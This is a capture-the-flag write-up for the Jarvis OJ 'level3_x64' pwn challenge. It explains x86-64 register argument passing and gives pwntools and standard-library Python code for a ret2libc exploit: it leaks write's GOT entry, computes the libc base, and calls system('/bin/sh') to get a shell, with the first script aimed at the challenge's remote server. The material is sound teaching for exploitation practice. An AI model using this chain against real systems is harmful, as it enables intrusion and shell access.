(Jarvis Oj)(Pwn) level3_x64
This challenge is the 64-bit version of level3, and the approach is the same as for the 32-bit version. The difference is how function arguments are passed: on x86-64 the first arguments go in registers (rdi, rsi, rdx) instead of on the stack, so the ROP chain has to pop the arguments into those registers before calling write. The script I wrote is as follows:
from pwn import *
#conn=process('./level3_x64')
conn=remote("pwn2.jarvisoj.com", "9883")
e=ELF('./level3_x64')
#libc=ELF('/usr/lib64/libc-2.26.so')
libc=ELF('./libc-2.19.so')   # libc shipped with the challenge, used to compute offsets after the leak
pad=0x80                     # bytes of junk before the saved return address
vul_addr=0x4005e6            # address of the vulnerable function, returned to for a second round
write_plt=e.symbols['write'] # PLT stub of write (pwntools also exposes it as e.plt['write'])
write_got=e.got['write']     # GOT slot holding write's libc address, the target of the leak
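The following is an added example, not the writeup's own script, showing the point made above: in the 32-bit version the arguments to write simply follow the return address on the stack, while on x86-64 the chain has to load rdi and rsi with pop gadgets before the PLT stub runs. It uses only the standard library so it runs offline. pad and vul_addr are the writeup's values; the gadget addresses, PLT/GOT addresses and libc offsets are hypothetical (assumptions) and on a real target come from ROPgadget/ropper and pwntools' ELF as in the script above.

```python
# Added example (not the writeup's script): x86-64 ROP argument passing versus x86.
# Gadget addresses, PLT/GOT addresses and libc offsets are assumptions.
import struct

def p32(v): return struct.pack('<I', v & 0xffffffff)
def p64(v): return struct.pack('<Q', v & 0xffffffffffffffff)
def u64(b): return struct.unpack('<Q', bytes(b[:8]).ljust(8, b'\x00'))[0]

PAD = 0x80            # from the writeup: junk up to the saved return address
VUL_ADDR = 0x4005e6   # from the writeup: re-enter the vulnerable function for round two

# Hypothetical gadget addresses (assumption; locate the real ones with ROPgadget/ropper)
POP_RDI_RET = 0x4006a3       # pop rdi ; ret
POP_RSI_R15_RET = 0x4006a1   # pop rsi ; pop r15 ; ret  (typical __libc_csu_init tail)

def rop_call_x86(func, ret_to, *args):
    """32-bit cdecl: func's address, then the return address, then the args on the stack."""
    return p32(func) + p32(ret_to) + b''.join(p32(a) for a in args)

def rop_call_x64(func, ret_to, rdi, rsi):
    """64-bit SysV: the first two args are popped into rdi/rsi before func runs.
    rdx (write's length argument) is left untouched here; the chain assumes the
    leftover value is large enough, otherwise a pop rdx gadget would be needed."""
    return (p64(POP_RDI_RET) + p64(rdi)
            + p64(POP_RSI_R15_RET) + p64(rsi) + p64(0)   # r15 receives a junk qword
            + p64(func) + p64(ret_to))

def stage1_payload(write_plt, write_got):
    """Leak write's libc address: write(1, &got['write'], ...) then re-run the bug."""
    return b'A' * PAD + rop_call_x64(write_plt, VUL_ADDR, 1, write_got)

def leak_to_libc_base(leaked_bytes, libc_write_off):
    """The first 8 leaked bytes are write's runtime address; subtract its libc offset."""
    return u64(leaked_bytes) - libc_write_off

def stage2_payload(libc_base, libc_system_off, libc_binsh_off):
    """system("/bin/sh"): a single argument, so only rdi needs a gadget."""
    system = libc_base + libc_system_off
    binsh = libc_base + libc_binsh_off
    return b'A' * PAD + p64(POP_RDI_RET) + p64(binsh) + p64(system)

if __name__ == '__main__':
    # Constructed sample values (assumptions, not taken from the real binary or libc)
    write_plt, write_got = 0x400430, 0x600a58
    libc_write_off, libc_system_off, libc_binsh_off = 0xf72b0, 0x46590, 0x17c8c3
    p1 = stage1_payload(write_plt, write_got)
    # Constructed leak: pretend libc is mapped at 0x7ffff7a00000
    fake_leak = p64(0x7ffff7a00000 + libc_write_off)
    base = leak_to_libc_base(fake_leak, libc_write_off)
    p2 = stage2_payload(base, libc_system_off, libc_binsh_off)
    print(hex(base), len(p1), len(p2))
```

With the real script, p1 is what gets sent after the prompt, the first 8 bytes read back go through leak_to_libc_base with libc.symbols['write'], and p2 is built from libc.symbols['system'] and next(libc.search(b'/bin/sh')). One caveat for newer targets: glibc versions after the 2.19 used here contain SSE instructions in system that require a 16-byte aligned stack, so a chain that crashes inside system usually needs an extra ret gadget inserted before the system address; the old libc in this challenge does not need it.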